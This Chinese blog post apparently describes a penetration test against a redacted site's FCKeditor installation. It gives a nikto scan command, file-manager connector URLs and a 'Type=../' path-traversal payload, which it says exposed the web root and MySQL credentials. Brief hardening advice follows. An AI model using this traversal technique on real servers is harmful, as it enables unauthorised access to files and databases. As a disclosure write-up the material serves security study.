0x0介绍
CKEditor即大名鼎鼎的FCKeditor,常见的文本编辑器还有Ewebeditor\UEditor\KindEditor\XHeditor等;功能都类似,上传图片、视频、远程下载功能,由于减少了开发时间,所以安全漏洞很厉害。FCKeditor是一个开源的文字编辑器,适用于asp\php\jsp\aspx等网站,FCKeditor后改名CKeditor.
0x01
前期信息收集
看出打开了很多端口,其中3306是mysql端口,还有个8080的http代理服务端口,可以从这里进去。
然后进去端口后发现什么都没有。
使用nikto -h xxxxxxxxxxxxxxxxxx:8080
爆出三个敏感地址,
http://xxxxxxx.8080/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
http://xxxxxxx.8080/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Flash&Connector=connectors/jsp/connector
http://xxxxxxx.8080/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Media&Connector=connectors/jsp/connector
很好,进去后发现,上传文件是不能够解释执行,这个地址没有。还要找其他目录,我是通过nikto查看到有相关fckconfig.js配置信息,我才猜测有些目录是没有在配置信息里面。最后网上查询FCKeditor路径信息:
对于jsp版本:
http://xxxxxxx.8080/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector
爆出根目录,里面藏有很多敏信息,以及MYSQL的配置信息。还能通过sql工具进行外联。危险程度可想而知。处于“一个衣服都不穿的女人那样”。直接连接网页数据库:
防御建议:
对与此类的文本编辑器,对fckconfig.js的配置信息要删除或隐藏,还有服务端口关掉 ,这些信息都会暴露了你的相关信息。本次漏洞与提交到漏洞盒子,有兴趣的朋友可以加入我们的团队未命名安全团队。
本文暂时没有评论,来添加一个吧(●'◡'●)